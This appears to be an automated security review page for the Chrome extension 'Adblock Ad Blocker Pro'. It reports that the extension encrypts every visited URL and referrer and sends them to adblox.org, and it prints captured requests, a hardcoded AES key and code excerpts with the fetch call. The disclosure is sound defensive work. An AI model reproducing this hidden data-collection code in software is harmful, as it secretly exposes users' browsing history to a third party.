Is Adblock Ad Blocker Pro safe?

High risk

Adblock is high risk. On every navigation, Adblock Ad Blocker Pro sends the URL just loaded and the previous URL to adblox.org automatically, no opt-in. Six requests confirmed: google.com, amazon.com, facebook.com visits produced POSTs with URLs in the bodies.…

adbloxteamv2.0.17Chrome Web Store
75Risk

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-200
SourceAI SANDBOX

Every URL and Referrer Exfiltrated to adblox.org on Every Page Load

On every navigation, Adblock Ad Blocker Pro sends the URL just loaded and the previous URL to adblox.org automatically, no opt-in.

Six requests confirmed: google.com, amazon.com, facebook.com visits produced POSTs with URLs in the bodies.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You load any HTTP or HTTPS page in your browser.

The extension did this

The extension records that URL and the one you came from, encrypts them with a key embedded in its own code, and immediately sends them to adblox.org.

This applies to every site, your banking portal, medical information searches, private business research. There is no allowlist or opt-out.

02EvidenceNETWORK CAPTURE
Captured request
POSThttps://adblox.org/api_v1/safe_search1.php
6 POST requests captured from service worker. Decrypted bodies confirmed targetUrl and referrerUrl for each canary navigation: facebook.com, google.com, amazon.com.
Headers
Content-Typeapplication/json;charset=utf-8
Body
{
  "data": "\"Lp9vQxM3nB7rT2kZwS5cYhJeGiU6DfNoCa8tWxPdKR1mElAOb4Hq=\""
}
03EvidenceFIELD TABLE
The two key fields in every exfiltrated payload:
FieldValueWhy it matters
URL you visited
https://www.amazon.com/dp/B09BVKF3WLThe full address of every page you loaded, including query parameters that may contain search terms, user IDs, or session tokens.
URL you came from
https://www.google.com/search?q=headphones+under+100The page you were on before, creates a browsing trail that shows not just what you visited but how you got there.
Persistent user ID
945a0a8f-5d90-4bc7-aace-2fe69c7f72b3The same UUID in every request, permanently linking all captured URLs to your browser install.
Device timestamp
1744659198493Unix millisecond timestamp of the navigation.
04EvidenceCODE COMPARE
The code that does this

The POST call and the payload assembly, from the shipping source:

What it actually does
The POST to adblox.org
function postToAdblox(payload) {
  fetch('https://adblox.org/api_v1/safe_search1.php', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json;charset=utf-8' },
    body: JSON.stringify(payload)   // {data: '<base64 AES-GCM ciphertext>'}
  });
}
Payload dispatch — skips if less than 10 seconds since last send
const encrypted = await encryptPayload(navigationRecord);
if (encrypted?.request?.enRequest) {
  const now = Date.now();
  if (now - lastSentTimestamp >= 10_000) {  // rate limit: 1 per 10 s
    lastSentTimestamp = now;
    postToAdblox({ data: encrypted.request.enRequest });
  }
}
05EvidenceTHIRD PARTY LIST
Destination of your URL history:
  • adblox.org

    Receives every navigation record. The /api_v1/safe_search1.php path suggests a safe-browsing check, but the payload holds full URLs/referrers tied to a persistent user ID.

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-359
SourceAI SANDBOX

Browsing URLs and Referrers Sent to adblox.org on Every Navigation

Each page load, Adblock Ad Blocker Pro records the visited and referring URL, encrypts them, and POSTs to adblox.org/api_v1/safe_search1.php; absent on new installs, the gate always passes.

The hardcoded AES key decrypted 20 captured POSTs.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You navigate to any HTTP or HTTPS page in Chrome.

The extension did this

The extension packages the URL you visited and the URL you came from, encrypts them, and sends them to adblox.org.

The 'safeSearch' storage flag controls this behavior. When the key is absent, the state for all new installs, the check evaluates to true and the data is sent.

02EvidenceNETWORK CAPTURE
Captured request
POSThttps://adblox.org/api_v1/safe_search1.php
20 POST requests captured from the background service worker. After AES-GCM decryption with key gH7kL9rT2vXe1qMz, bodies contained targetUrl and referrerUrl for every canary navigation. A planted marker value was confirmed in decrypted targetUrl captures during dynamic analysis. A second planted marker value was confirmed in targetUrl and referrerUrl captures during dynamic analysis.
Headers
Content-Typeapplication/json;charset=utf-8
Body
{"data":"\"Yq8mZK3rN2vXpT1sQ7wLbF5cJd0hGiUeA9oRnyMxz4C6OlkBDPsHtWVfEj2gu==""}
03EvidenceFIELD TABLE
What the extension sends on every navigation:
FieldValueWhy it matters
URL you visited
https://www.reddit.com/r/privacy/comments/Canary_test_<planted marker>The full address of the page loaded, including query parameters that may hold search terms, session tokens, or account identifiers.
URL you came from
https://www.amazon.com/<planted marker>CANARYThe page you were on before this one. Combined with the visited URL, this builds a chain of your browsing activity.
Persistent user ID
23ca658d-9f7b-4d35-84cf-3c6895813535A UUID generated once at install and stored permanently. Every request carries this same ID, linking captured URLs to your install.
Device timestamp
1744659198493When the navigation happened, in milliseconds since Unix epoch.
HTTP method
GETThe request type for the navigation (e.g. GET).
Content type
text/htmlThe MIME type of the page response, as returned in the server headers.
04EvidenceOPAQUE REVEAL
Why you can't catch this in DevTools

The POST body contains a single base64-encoded field called 'data'. The content is encrypted with AES-128-GCM. It cannot be read in your browser's DevTools without knowing the key, but the key is hardcoded in the extension source.

What's actually being sent
[
  {
    "fileDate": "2026-04-14T19:13:18.493Z",
    "deviceTimestamp": 1744659198493,
    "userId": "23ca658d-9f7b-4d35-84cf-3c6895813535",
    "referrerUrl": "https://www.amazon.com/<planted marker>CANARY",
    "targetUrl": "https://www.reddit.com/r/privacy/comments/Canary_test_<planted marker>",
    "requestType": "GET",
    "contentType": "text/html",
    "statusCode": 200,
    "foreground": 1
  }
]
05EvidenceTHIRD PARTY LIST
Where your browsing data is sent:
  • adblox.org

    Receives every navigation record via POST to /api_v1/safe_search1.php. Name suggests safe-browsing use, but payloads hold full URLs and referrers tied to a persistent user ID.

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-200
SourceAI SANDBOX

Full Navigation Records Transmitted to adblox.org via AES-Encrypted POST

On every page load, Adblock Ad Blocker Pro records your URL, referrer, status, content type, method, timestamp, and user ID, encrypts it with a hardcoded AES key, sent to adblox.org. 20 POSTs matched URLs visited. 'safeSearch' defaults on.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You visit any HTTP or HTTPS page in Chrome.

The extension did this

The extension records the full navigation record, URL, referrer, content type, status code, and your persistent user ID, encrypts it, and sends it to adblox.org.

The transmission is rate-limited to one POST every 10 seconds. If two navigations happen within that window, the second is not sent.

02EvidenceNETWORK CAPTURE
Captured request
POSThttps://adblox.org/api_v1/safe_search1.php
20 POST requests captured from the background service worker context. Decrypted bodies confirmed: a planted marker value in targetUrl during dynamic analysis and referrerUrl chain canarytest-bird77321 → amazon/<planted marker>CANARY → wiki/a planted marker value → reddit confirmed during dynamic analysis. All 20 bodies contained userId 23ca658d-9f7b-4d35-84cf-3c6895813535.
Headers
Content-Typeapplication/json;charset=utf-8
Body
{
  "data": "\"Lp9vQxM3nB7rT2kZwS5cYhJeGiU6DfNoCa8tWxPdKR1mElAOb4HqsFzWv+Yg=\""
}
03EvidenceFIELD TABLE
Fields in every transmitted navigation record:
FieldValueWhy it matters
URL visited
https://en.wikipedia.org/wiki/Canary_test_<planted marker>The full address of the page you loaded, including query parameters.
Referring URL
https://www.amazon.com/<planted marker>CANARYThe page you were on immediately before, building a navigation trail.
User ID
23ca658d-9f7b-4d35-84cf-3c6895813535A UUID assigned once at install and kept permanently. All navigation records from your browser carry this same value.
Device timestamp
1744659198493Unix millisecond timestamp of the navigation.
HTTP method
GETThe HTTP verb used for the navigation request.
Content type
text/htmlMIME type of the page response.
HTTP status code
200The server's response status for the navigation.
04EvidenceCODE COMPARE
The code that does this

The payload assembly and POST dispatch from the shipping source:

What it actually does
Payload assembly
// Assembles the navigation record from tab state and response headers.
const record = {
  fileDate:        new Date().toISOString(),
  deviceTimestamp: Date.now(),
  userId:          sv,                     // persistent UUID from chrome.storage.local
  referrerUrl:     referrerUrl,            // from hv()-maintained tab cache
  targetUrl:       targetUrl,
  requestType:     contentMeta.requestType,  // HTTP method from webRequest headers
  contentType:     contentMeta.contentType,
  statusCode:      contentMeta.statusCode,
  foreground:      await isTabActive(tabId)  // 1 if tab is active, 0 otherwise
};
Encrypt and dispatch with 10-second rate limit
const encrypted = await encryptPayload([record]);
if (encrypted?.request?.enRequest) {
  const now = Date.now();
  if (now - lastSentTimestamp >= 10_000) {   // rate limit: once per 10 s
    lastSentTimestamp = now;
    postToAdblox({ data: encrypted.request.enRequest });
  }
}
The POST to adblox.org
function postToAdblox(payload) {
  fetch('https://adblox.org/api_v1/safe_search1.php', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json;charset=utf-8' },
    body: JSON.stringify(payload)
  });
}
05EvidenceTHIRD PARTY LIST
Destination of navigation records:
  • adblox.org

    Primary recipient of navigation records via /api_v1/safe_search1.php. Also hosts the Sentry endpoint at kent.adblox.org, which receives the userId on extension updates.

+11 more findings not shown

What it can do

Permissions this extension asks for, as declared in version 2.0.17. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.

  • Read and change your data on every site you visit

    *://*/*

  • Act on the current tab, but only after you click the extension

    activeTab

  • Block and redirect the requests your browser makes

    declarativeNetRequest

  • Watch every request your browser makes

    webRequest

  • Run its own code inside the pages you visit

    scripting

  • Store data in your browser

    storage

Updated 30 September 2026dgjbaljgolmlcmmklmmeafecikidmjpi